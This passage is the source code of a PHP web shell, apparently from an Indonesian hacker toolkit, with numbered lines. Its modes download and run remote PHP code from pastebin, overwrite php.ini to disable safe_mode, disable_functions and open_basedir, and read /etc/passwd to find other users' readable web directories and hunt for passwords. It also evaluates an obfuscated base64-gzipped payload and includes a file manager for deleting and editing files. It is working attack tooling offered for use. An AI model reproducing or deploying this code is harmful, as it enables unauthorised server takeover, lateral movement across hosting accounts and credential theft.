1979. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
1980. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
1981. <br/><br/><br/><br/>
1982. <?php
1983. }
1984. //////////////////////////////////////////////////
1985. //////////////////////////////////////////////////
1986.  
1987. ////////////////////////////////////////
1988. ///////////////////////////////////////
1989. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) {
1990. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With System Function</span><center>';
1991. mkdir('bysyswsf', 0755);
1992. chdir('bysyswsf');
1993. $bysyswsf = file_get_contents("http://pastebin.com/raw/nUTTPQnm");
1994. $file = fopen("bysyswsf.php" ,"w+");
1995. $write = fwrite ($file ,$bysyswsf);
1996. fclose($file);
1997. chmod("bysyswsf.php",0755);
1998. echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>";
1999. }
2000. ////////////////////////////////////////
2001. ////////////////////////////////////////
2002. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) {
2003. $byht = "safe_mode = Off
2004. disable_functions = None
2005. safe_mode_gid = OFF
2006. open_basedir = OFF
2007. allow_url_fopen = On";
2008. file_put_contents("php.ini",$byht);
2009. echo "<script>alert('Congrats! Sukses Bos Q ~_^'); hideAll();</script>";
2010. die('<meta http-equiv="refresh" content="0; url=?" />');
2011. }
2012. ////////////////////////////////////////
2013. ///////////////////////////////////////
2014. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) {
2015. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With Exec Function</span><center>';
2016. mkdir('bysyswexecf', 0755);
2017. chdir('bysyswexecf');
2018. $bysyswsf = file_get_contents("http://pastebin.com/raw/KJiLdADd");
2019. $file = fopen("bysyswexecf.php" ,"w+");
2020. $write = fwrite ($file ,$bysyswsf);
2021. fclose($file);
2022. chmod("bysyswexecf.php",0755);
2023. echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>";
2024. }
2025. ////////////////////////////////////////
2026. ////////////////////////////////////////
2027.  
2028. ///////////////////////////////////////////////////////////////////////////
2029. ///////////JUMPING////////////////////////////////////////////////////////
2030. //////////////////////////////////////////
2031. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){
2032. ?>
2033. <form action="?path=<?php echo $pwd; ?>&amp;x=jumping" method="post">
2034. <?php
2035. //radable public_html
2036. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
2037. set_time_limit(0);
2038. ###################
2039. @$passwd = fopen('/etc/passwd','r');
2040. if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); }
2041. $pub = array();
2042. $users = array();
2043. $conf = array();
2044. $i = 0;
2045. while(!feof($passwd))
2046. {
2047. $str = fgets($passwd);
2048. if ($i > 35)
2049. {
2050. $pos = strpos($str,':');
2051. $username = substr($str,0,$pos);
2052. $dirz = '/home/'.$username.'/public_html/';
2053. if (($username != ''))
2054. {
2055. if (is_readable($dirz))
2056. {
2057. array_push($users,$username);
2058. array_push($pub,$dirz);
2059. }
2060. }
2061. }
2062. $i++;
2063. }
2064. ###################
2065. echo '<br><br></center></center>';
2066. echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font>";
2067. echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font>";
2068. echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>";
2069. foreach ($users as $user)
2070. {
2071. $path = "/home/$user/public_html/";
2072. echo "<font class='rapihbanget'><a href='?path&#61;$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>";
2073. }
2074. echo "<br /><font class='rapihbanget'>[+] Complete...\n"."<br /></font>";
2075. echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!\n"."<br /></font>";
2076. echo '<br><br></b></body><center>';
2077. }
2078. ///////////////
2079. elseif(isset($_GET['x']) && ($_GET['x'] == 'zonesH')){ echo "<br/><br/>";@eval(gzinflate(base64_decode($zoneH))); "</div>"; }
2080. /////////////
2081.  
2082. /*
2083. File Manager
2084. Dimulai Dari Sini
2085. */
2086. else{
2087. echo '<table><br />';
2088. ////////////////////////////////////////////////////////////////////////
2089. /////////////////////////////////////////////////////////////////////////
2090.  
2091. echo "<center>";
2092. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
2093. if($_POST['type'] == 'dir'){
2094. if(rmdir($_POST['path'])){
2095. echo '<script>alert("Delete Dir Sukses!");</script>';
2096. }else{
2097. echo '<script>alert("Delete Dir Gagal!");</script>';
2098. }
2099. }elseif($_POST['type'] == 'file'){
2100. if(unlink($_POST['path'])){
2101. echo '<script>alert("Delete File Sukses!");</script>';
2102. }else{
2103. echo '<script>alert("Delete File Gagal!");</script>';
2104. }
2105. }
2106. }
2107. echo '</center>';
2108. $scandir = scandir($path);
2109. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
2110. ';
2111.  
2112. foreach($scandir as $dir){
2113. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
2114. echo "<tr>
2115. <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td>
2116. <td><center style='color:orange; font-family:Homenaje;'>--</center></td>
2117. <td><center>";
2118. if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
2119. elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>";
2120. echo perms("$path/$dir");
2121. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
2122.  
2123. echo "</center></td>
2124. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
2125. <select class='bordergaya' name=\"opt\">
2126. <option value=\"\"></option>
2127. <option value=\"delete\">Delete</option>
2128. <option value=\"chmod\">Chmod</option>
2129. <option value=\"rename\">Rename</option>
2130. </select>
2131. <input type=\"hidden\" name=\"type\" value=\"dir\">
2132. <input type=\"hidden\" name=\"name\" value=\"$dir\">
2133. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
2134. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
2135. </form></center></td>
2136. </tr>";
2137. }
2138. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
2139. foreach($scandir as $file){
2140. if(!is_file("$path/$file")) continue;
2141. $size = filesize("$path/$file")/1024;
2142. $size = round($size,3);
2143. if($size >= 1024){
2144. $size = round($size/1024,2).' MB';
2145. }else{
2146. $size = $size.' KB';
2147. }
2148.  
2149. echo "<tr>
2150. <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
2151. <td><center style='color:orange; font-family:Homenaje;'>".$size."</center></td>
2152. <td><center>";
2153. if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
2154. elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>";
2155. echo perms("$path/$file");
2156. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
2157. echo "</center></td>
2158. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
2159. <select class='bordergaya' name=\"opt\">
2160. <option value=\"\"></option>
2161. <option value=\"delete\">Delete</option>
2162. <option value=\"chmod\">Chmod</option>
2163. <option value=\"rename\">Rename</option>
2164. <option value=\"edit\">Edit</option>
2165. </select>
2166. <input type=\"hidden\" name=\"type\" value=\"file\">
2167. <input type=\"hidden\" name=\"name\" value=\"$file\">
2168. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
2169. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
2170. </form></center></td>
2171. </tr>";
2172. }
2173. echo '</table>
2174. </div>';
2175.  
2176. }
2177. ///////////////////////////////////////////////////////////////////////
2178. ////////////////////////////////////////////////////////////////////////
2179.  
2180. ?>
2181. <br/><br/>
2182. <div id="bawah">
2183. <script language="JavaScript">
2184. Year=new Date();
2185. var copyright=Year.getUTCFullYear(); document.write("<tabel style='padding:3px 6px; border:2px solid #2d2b2b; border-radius:5px;'><tr><td><font face='Fredericka the Great' size='3px' color='gray'> "+ copyright +" </font></td></tr></table>"); </script>
2186. </div>
2187. </BODY></html>